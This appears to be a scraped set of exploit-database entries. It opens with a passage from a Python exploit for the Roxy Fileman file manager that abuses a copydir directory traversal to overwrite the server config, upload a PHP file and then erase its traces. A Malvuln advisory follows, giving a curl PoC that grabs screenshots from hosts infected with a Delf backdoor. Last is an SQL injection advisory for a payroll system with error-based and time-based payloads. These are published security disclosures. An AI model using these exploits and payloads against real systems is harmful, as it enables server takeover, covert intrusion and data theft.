"\s" is an invalid escape sequence in a normal str literal<br />modified_conf =re.sub(r"\sphp\s", " ", orig_conf)<br />with open("conf.json", "w") as conf_file:<br /> conf_file.write(modified_conf)<br />body = {"action": (None, "upload"), "method": (None, "ajax"), "d": (None, fileman_path), "files[]": open("conf.json", "rb")}<br />res = requests.post(url, headers=headers, files=body)<br />#remove("conf.json")<br />if '"res":"ok"' in res.text:<br /> print("[+] created fileman directory structure with modified conf.json")<br />else:<br /> print("[-] failed to upload modified conf.json")<br /> failure()<br /><br /><br /># overwrite server conf.json with copydir directory traversal vulnerability<br />url = roxy_url + "php/copydir.php"<br />body = "d={}&n={}".format(quote_plus(fileman_path), quote_plus(uploads_path+"/../.."))<br />res = requests.post(url, headers=form_headers, data=body)<br />if '"res":"ok"' in res.text:<br /> print("[+] overwritten server conf.json using copydir directory traversal")<br />else:<br /> print("[-] failed to overwrite server conf.json using copydir directory traversal")<br /> failure()<br /><br /><br /># upload php file<br />url = roxy_url + "php/upload.php"<br />body = {"action": (None, "upload"), "method": (None, "ajax"), "d": (None, tmp_path), "files[]": open(php_file, "rb")}<br />res = requests.post(url, headers=headers, files=body)<br />if '"res":"ok"' in res.text:<br /> print("[+] successfully uploaded PHP file")<br /> print("[*] you can manually request the file at: " + "/".join(roxy_url.split("/")[:3]) + tmp_path + "/" + php_file)<br /> print("[*] don't forget to delete this as well as its containing directory using the file manager if you wanna be stealthy")<br />else:<br /> print("[-] failed to upload PHP file")<br /> failure()<br /><br /><br /># restore original conf.json and cleanup unwanted files/dirs<br />url = roxy_url + "php/deletefile.php"<br />body = "f=" + quote_plus(fileman_path+"/conf.json")<br />res = requests.post(url, headers=form_headers, data=body)<br />if '"res":"ok"' not in res.text:<br /> print("[-] failed to cleanup")<br /> failure()<br /><br />url = roxy_url + "php/upload.php"<br />with open("conf.json", "w") as conf_file:<br /> conf_file.write(orig_conf)<br />body = {"action": (None, "upload"), "method": (None, "ajax"), "d": (None, fileman_path), "files[]": open("conf.json", "rb")}<br />res = requests.post(url, headers=headers, files=body)<br />#remove("conf.json")<br />if '"res":"ok"' not in res.text:<br /> print("[-] failed to cleanup")<br /> failure()<br /><br />url = roxy_url + "php/copydir.php"<br />body = "d={}&n={}".format(quote_plus(fileman_path), quote_plus(uploads_path+"/../.."))<br />res = requests.post(url, headers=form_headers, data=body)<br />if '"res":"ok"' in res.text:<br /> print("[+] original conf.json restored")<br />else:<br /> print("[-] failed to cleanup")<br /> failure()<br /><br />url = roxy_url + "php/deletefile.php"<br />body = "f=" + quote_plus(fileman_path+"/conf.json")<br />res = requests.post(url, headers=form_headers, data=body)<br />if '"res":"ok"' not in res.text:<br /> print("[-] failed to cleanup")<br /> failure()<br /><br />url = roxy_url + "php/deletedir.php?d=" + quote_plus(fileman_path)<br />res = requests.get(url, headers=headers)<br />if '"res":"ok"' in res.text:<br /> print("[+] cleanup finished successfully")<br />else:<br /> print("[-] failed to cleanup")<br /> failure()<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/cf3c08afa6c2d49ba36ed0f895893d71.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Delf.ps<br />Vulnerability: Information Disclosure<br />Description: The malware listens on TCP port 80. Third-party adversaries who can reach an infected host can generate and download screenshots of the system's desktop.<br />Family: Delf<br />Type: PE32<br />MD5: cf3c08afa6c2d49ba36ed0f895893d71<br />Vuln ID: MVID-2022-0532<br />Disclosure: 04/02/2022<br /><br />Exploit/PoC:<br />C:\>curl http://x.x.x.x:80 > screenshot.jpg<br /> % Total % Received % Xferd Average Speed Time Time Time Current<br /> Dload Upload Total Spent Left Speed<br />100 280k 0 280k 0 0 280k 0 --:--:-- --:--:-- --:--:-- 2577k<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>## Title: Payroll Management System v1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 04.03.2022<br />## Vendor: https://www.sourcecodester.com/user/257130/activity<br />## Software: https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Payroll-Management-System<br /><br />## Description:<br />The `username` parameter appears to be vulnerable to SQL injection attacks.<br />The application interacted with an attacker-controlled domain, indicating that the<br />injected SQL query was executed.<br />An attacker can take control of the administrator account and of all other<br />accounts on this system, and can also download all information held by it.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br /><br />---<br />Parameter: username (POST)<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: username=qkdmZlGW' AND (SELECT 3371 FROM(SELECT<br />COUNT(*),CONCAT(0x716b707871,(SELECT<br />(ELT(3371=3371,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VIhP&password=s0N!s2u!A6'<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=qkdmZlGW' AND (SELECT 9476 FROM<br />(SELECT(SLEEP(5)))NodP)-- Xiww&password=s0N!s2u!A6'<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Payroll-Management-System)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/aj8bcv)<br /><br /><br /></code></pre>